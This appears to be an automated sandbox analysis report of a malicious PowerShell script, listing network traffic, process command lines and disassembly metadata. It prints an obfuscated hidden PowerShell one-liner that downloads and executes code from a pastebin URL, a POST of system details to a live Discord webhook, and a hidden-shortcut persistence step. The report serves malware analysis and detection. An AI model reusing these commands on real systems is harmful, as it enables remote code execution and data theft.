                                                                                                2024-10-15 13:52:46 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 47 54 79 66 6c 6c 63 52 62 32 53 74 36 34 30 75 6c 61 30 4e 31 68 6c 55 33 38 75 72 4e 5a 44 64 52 72 71 4c 57 67 45 66 34 67 51 2d 31 37 32 39 30 30 30 33 36 36 33 33 39 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 61 61 30 35 39 38 30 34 36 34 32 2d 44 46 57 0d 0a 0d 0a
                                                                                                Data Ascii: Set-Cookie: _cfuvid=GTyfllcRb2St640ula0N1hlU38urNZDdRrqLWgEf4gQ-1729000366339-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304aa059804642-DFW


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.549847162.159.138.2324431196C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-15 13:52:51 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                Content-Type: application/json
                                                                                                Host: discord.com
                                                                                                Content-Length: 300
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:52:51 UTC300OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 61 6c 66 6f 6e 73 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 53 5f 37 44 43 38 42 47 48 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20
                                                                                                Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** S_7DC8BGH\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC
                                                                                                2024-10-15 13:52:52 UTC1356INHTTP/1.1 204 No Content
                                                                                                Date: Tue, 15 Oct 2024 13:52:52 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Connection: close
                                                                                                set-cookie: __dcfduid=c57843ec8afc11efa5f41aa1ab2748bc; Expires=Sun, 14-Oct-2029 13:52:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                x-ratelimit-limit: 5
                                                                                                x-ratelimit-remaining: 4
                                                                                                x-ratelimit-reset: 1729000373
                                                                                                x-ratelimit-reset-after: 1
                                                                                                via: 1.1 google
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mgrLPyjOaeQJQyk4gI6v%2FMwHOtQTo%2ByNj3cdU17s5%2B0xSQJwl94cdsDZsbW1I7Xfx%2FaSMMjERa0NvB4IGTSe2zjIY62aoA3BupvhRhgG85jWAWTEqWjfyVgiPRgK"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                Set-Cookie: __sdcfduid=c57843ec8afc11efa5f41aa1ab2748bcabf861a71f48f0bd34aad2c453fc065a34006aec982ee3151cc331cad3377426; Expires=Sun, 14-Oct-2029 13:52:52 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                Set-Cookie: __cfruid=6fb5ae50141920538597a7b6eba71d34806ac590-1729000372; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                2024-10-15 13:52:52 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 38 4f 75 48 48 6e 57 4c 48 64 4f 5a 56 4c 49 68 53 72 39 33 51 73 4b 58 31 66 4d 6c 35 6f 5a 46 4c 4a 2e 48 43 5f 34 56 63 46 4d 2d 31 37 32 39 30 30 30 33 37 32 31 33 35 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 33 30 34 61 63 34 63 65 39 61 65 35 61 35 2d 44 46 57 0d 0a 0d 0a
                                                                                                Data Ascii: Set-Cookie: _cfuvid=8OuHHnWLHdOZVLIhSr93QsKX1fMl5oZFLJ.HC_4VcFM-1729000372135-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304ac4ce9ae5a5-DFW


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:09:52:05
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\cr_asm.ps1"
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:1
                                                                                                Start time:09:52:05
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:4
                                                                                                Start time:09:52:24
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\forfiles.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                                Imagebase:0x7ff6d71d0000
                                                                                                File size:52'224 bytes
                                                                                                MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:5
                                                                                                Start time:09:52:24
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\attrib.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                                                Imagebase:0x7ff655d10000
                                                                                                File size:23'040 bytes
                                                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:6
                                                                                                Start time:09:52:24
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:7
                                                                                                Start time:09:52:25
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:8
                                                                                                Start time:09:52:25
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:9
                                                                                                Start time:09:52:33
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\forfiles.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                                                Imagebase:0x7ff6d71d0000
                                                                                                File size:52'224 bytes
                                                                                                MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:10
                                                                                                Start time:09:52:33
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:11
                                                                                                Start time:09:52:33
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:12
                                                                                                Start time:09:52:34
                                                                                                Start date:15/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Executed Functions

                                                                                                  Function 00007FF848E7BC46 Relevance: .5, Instructions: 544COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2384986402.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848e70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ed51b12a463f842c9883d1d7aaf7f913f5428198337ca702226e1a90bf662336
                                                                                                  • Instruction ID: a96154dc088fb392ff7a95cbe3e00ea46d8bc9e001b48f2c9e7165d6f4dcf046
                                                                                                  • Opcode Fuzzy Hash: ed51b12a463f842c9883d1d7aaf7f913f5428198337ca702226e1a90bf662336
                                                                                                  • Instruction Fuzzy Hash: D302813091CA8E8FEBA8EF28C8557E937E1FF55350F04427AD84DC7291DB38A9458B85
                                                                                                  Function 00007FF848E7C9F2 Relevance: .5, Instructions: 522COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2384986402.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848e70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 491ddf3d8d1655297146d228b1a3e4208f8020b629ffd1d8f452d634d446d5ad
                                                                                                  • Instruction ID: 0540ad08a050956d55767b9a5bdc5ab776501d56a56bc9d4cfee25cfc4d3a4cc
                                                                                                  • Opcode Fuzzy Hash: 491ddf3d8d1655297146d228b1a3e4208f8020b629ffd1d8f452d634d446d5ad
                                                                                                  • Instruction Fuzzy Hash: D402903090CA8E8FEBA8EF28D8557E977D1FF54350F04427AE84DC7291DB78A9458B81
                                                                                                  Function 00007FF848F4135F Relevance: .4, Instructions: 400COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2385424868.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0575fefb4677eb496a775da7de2ab5ba20bf2d693c6c44a470800b62137c58df
                                                                                                  • Instruction ID: fd60f0183d2adcfbaf79803f94707ce117ebb0e08799a70e132421e0bc01693f
                                                                                                  • Opcode Fuzzy Hash: 0575fefb4677eb496a775da7de2ab5ba20bf2d693c6c44a470800b62137c58df
                                                                                                  • Instruction Fuzzy Hash: 9EC1F031E1CA5A8FE794EB2888446B577E1FF69790F1801BAD40ED32D2DF28EC858745
                                                                                                  Function 00007FF848E7C606 Relevance: .4, Instructions: 378COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2384986402.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848e70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ab5e4ea1b5981847f3314b53ef2cab2efb657bedfd3aa8217980cb1ef63089dc
                                                                                                  • Instruction ID: 5a201e5a5590478beca7da4c7385ad37fede4a846cff9a339828178d0625c0f9
                                                                                                  • Opcode Fuzzy Hash: ab5e4ea1b5981847f3314b53ef2cab2efb657bedfd3aa8217980cb1ef63089dc
                                                                                                  • Instruction Fuzzy Hash: 8CC1B33090CA8D8FEBA9EF2888557E93BD1FF55350F04426AD84DC7292DF34A945CB86
                                                                                                  Function 00007FF848E7ED44 Relevance: .2, Instructions: 224COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2384986402.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848e70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 581c1a1148300d6c4456827a8715e8534be128430ea2bfaa0d9b571cadaee1b0
                                                                                                  • Instruction ID: e09508ad4297db0db39ec7aeac7fdeb2c2865da5bb0781cfa3b328abbea6e880
                                                                                                  • Opcode Fuzzy Hash: 581c1a1148300d6c4456827a8715e8534be128430ea2bfaa0d9b571cadaee1b0
                                                                                                  • Instruction Fuzzy Hash: 9761A231E1CE4A8FE798EB2C98556B8B7D2FF99744F0441B9D44EC3297CE38A8028745
                                                                                                  Function 00007FF848E7EE8D Relevance: .1, Instructions: 147COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2384986402.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848e70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ca3b125efb34b7c36354b9d58944f2f925cf8d1eeb219f6745b3e1a381d7ea79
                                                                                                  • Instruction ID: d77bb45ed2432292b1e642a49afd9e80d42ac865073ecf3ab18b91ffdfa49828
                                                                                                  • Opcode Fuzzy Hash: ca3b125efb34b7c36354b9d58944f2f925cf8d1eeb219f6745b3e1a381d7ea79
                                                                                                  • Instruction Fuzzy Hash: FF41E231E1CA4E8FEB98EF1894516BCB7E2FF59B44F04017AD44ED3686CE34A8028785
                                                                                                  Function 00007FF848E7C104 Relevance: .1, Instructions: 92COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2384986402.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848e70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 47a338f5ca43a547ae41f6eece4055c98a791fb94c64ff1169f5489a8db2dd05
                                                                                                  • Instruction ID: b68c9b8ba2338c781942acaa08e0bbffaa02d0e38cddae283d28b23d6e31e784
                                                                                                  • Opcode Fuzzy Hash: 47a338f5ca43a547ae41f6eece4055c98a791fb94c64ff1169f5489a8db2dd05
                                                                                                  • Instruction Fuzzy Hash: 7E311A3081D64E8EFBB8BF59CD1ABF932A4FF46399F400139D40D86192CB386A85CA15
                                                                                                  Function 00007FF848E8180D Relevance: .1, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2384986402.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848e70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 609d3911145b5155ae2fbf7687ce9c8eace64f78be0cbf8fd8d2ac70f65a158e
                                                                                                  • Instruction ID: f781a71889af041a41551fed070b7e23b945c24af420ce9a0b3de8588a1ab940
                                                                                                  • Opcode Fuzzy Hash: 609d3911145b5155ae2fbf7687ce9c8eace64f78be0cbf8fd8d2ac70f65a158e
                                                                                                  • Instruction Fuzzy Hash: FD01454485E2C15ED383633818244B27FF8DE932A8B0C05EFD0C8CA0A3E909084AC357
                                                                                                  Function 00007FF848E73985 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2384986402.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848e70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                  • Instruction ID: bfc61f9fad0a133707b6e049df6a0e7078bb9af5b5810239e4a24aaed2fd2279
                                                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                  • Instruction Fuzzy Hash: B201677111CB0C4FDB44EF0CE451AA6B7E0FB99364F50056DE58AC3655D736E881CB45
                                                                                                  Function 00007FF848F44786 Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2385424868.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848f40000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9d9ae0c356f699e2c4e5a8e51db3b87548a1aae5ae7087df1eaa2e617bfcf3ec
                                                                                                  • Instruction ID: e766d57e805a7636d334f045fce066ce9191301374e3695a5eb2540877e70049
                                                                                                  • Opcode Fuzzy Hash: 9d9ae0c356f699e2c4e5a8e51db3b87548a1aae5ae7087df1eaa2e617bfcf3ec
                                                                                                  • Instruction Fuzzy Hash: C901D230A1E9495FEB84FB18D4049EAB7E0FF55694F6801BAE00DE3197DB29A8418304
                                                                                                  Function 00007FF848E84371 Relevance: .0, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2384986402.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_7ff848e70000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: be99ee3d4b368ef2ecacfd30368d669c4a4a693e473ebc03dc2625e66b4f9b32
                                                                                                  • Instruction ID: a4a17dd9866fe7b204796b7598e82af01a457d6b4ae95b886af1c025cec5c993
                                                                                                  • Opcode Fuzzy Hash: be99ee3d4b368ef2ecacfd30368d669c4a4a693e473ebc03dc2625e66b4f9b32
                                                                                                  • Instruction Fuzzy Hash: 18F0FC11A1DAC55FE345A76C64246B87B91FF85794F1941F6C04CCB2D3CA286C0583D6

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:3.2%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:3
                                                                                                  Total number of Limit Nodes:0
                                                                                                  execution_graph 9009 7ff848e96c34 9010 7ff848e96c3d LoadLibraryExW 9009->9010 9012 7ff848e96ced 9010->9012

                                                                                                  Executed Functions

                                                                                                  Function 00007FF848F509F2 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2563401995.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_7ff848f50000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 1@_L$pI$pI
                                                                                                  • API String ID: 0-3663808138
                                                                                                  • Opcode ID: ae10c5d704759e807c6588ef18965d07af39096a3ec8b740d00161491ab83fb6
                                                                                                  • Instruction ID: f413acabbbbf11116152f428fb08e04122de90a7c7fd9545af06479a84c605eb
                                                                                                  • Opcode Fuzzy Hash: ae10c5d704759e807c6588ef18965d07af39096a3ec8b740d00161491ab83fb6
                                                                                                  • Instruction Fuzzy Hash: 06C15731A0EBC55FD75AFB388469975BFE1EF97240B0805EEC489CB1E3DA15A806C385
                                                                                                  Function 00007FF848F50A2B Relevance: 2.7, Strings: 2, Instructions: 245COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000008.00000002.2563401995.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_7ff848f50000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 1@_L$pI
                                                                                                  • API String ID: 0-50416167
                                                                                                  • Opcode ID: e2372a2249e267ec3695e150500f05d3d25da62731a5cd7f55c7ce23933f0dac
                                                                                                  • Instruction ID: d1f6073c1de676d5ea73c822441f32b6220b515e6efdf9b6791b98378cc18e7c
                                                                                                  • Opcode Fuzzy Hash: e2372a2249e267ec3695e150500f05d3d25da62731a5cd7f55c7ce23933f0dac
                                                                                                  • Instruction Fuzzy Hash: F4715A30A0EA855FDB99FF38C49AD357BE1EF96340B0405ADC44AC76A3CA15EC06C785
                                                                                                  Function 00007FF848E96C34 Relevance: 1.6, APIs: 1, Instructions: 117libraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 99 7ff848e96c34-7ff848e96c3b 100 7ff848e96c46-7ff848e96caf 99->100 101 7ff848e96c3d-7ff848e96c45 99->101 104 7ff848e96cb1-7ff848e96cb6 100->104 105 7ff848e96cb9-7ff848e96ceb LoadLibraryExW 100->105 101->100 104->105 106 7ff848e96cf3-7ff848e96d1a 105->106 107 7ff848e96ced 105->107 107->106
                                                                                                  APIs
                                                                                                  Memory Dump Source
